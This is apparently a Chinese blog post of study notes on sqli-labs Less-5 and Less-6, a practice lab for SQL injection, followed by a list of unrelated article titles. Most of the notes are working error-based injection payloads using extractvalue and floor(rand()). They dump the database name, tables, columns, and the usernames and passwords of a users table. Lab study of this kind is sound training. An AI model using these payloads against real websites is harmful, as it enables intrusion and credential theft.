sqli lab less-5-6
2024-09-07 12:26:35
less-5
- 基于报错的注入
- 基于报错可以爆出当前数据库名等等
id=2’ and extractvalue(1, concat(0x7c,(select user())));-- #
?id=2’ and extractvalue(1, concat(0x7c,(select @@version)));-- #
?id=2’ and extractvalue(1, concat(0x7c,(select database())));-- #
- 爆当前数据库表
?id=2’ and extractvalue(1, concat(0x7c,(
select group_concat(table_name) from information_schema.tables where table_schema=database()
)));-- #
- 爆字段
?id=2’ and extractvalue(1, concat(0x7c,(
select group_concat(column_name) from information_schema.columns where table_name=‘users’
)));-- #
- 爆数据
?id=2’ and extractvalue(1, concat(0x7c,(
select group_concat(username) from users
)));-- #
?id=2’ and extractvalue(1, concat(0x7c,(
select group_concat(password) from users
)));-- #
- 这种方式爆出数据较少,可能爆不出想要的数据
?id=2’ union select 1,count(*), concat((
select password from users limit 2,1
), floor(rand()*2))as a from information_schema.tables group by a;
– #
修改limit
可以一条一条的爆出信息
- 上面基于xpath报错的函数也可以一条一条爆出信息
?id=2’ and extractvalue(1, concat(0x7c,(
select password from users limit 1,1
)));-- #
less-6
同上 " 闭合
最新文章
- 新手入门Underscore.js 中文(template)
- UILabel 的一个蛋疼问题
- gradle各版本下载地址
- Centos 6.5 安装 ionCube PHP Loader
- 申请Google API Key
- WinForm 窗体属性
- surge for mac出测试版本了
- 20145215《Java程序设计》第6周学习总结
- shell学习记录002-知识点储备
- Ubuntu Server如何配置SFTP
- JLINK固件丢失或升级固件后提示Clone的解决办法
- 用Windows Live Writer发来
- 远程连接MySql连不上1130
- Spring Security 入门详解(转)
- jQuery插件——ajax
- xBIM 应用与学习 (一)
- AM335x关于LCD屏幕的时钟PLL配置
- 【转】asp.net基础-HttpModule
- centos6.7 配置Elasticsearch
- C# 控制CH341进行SPI,I2C读写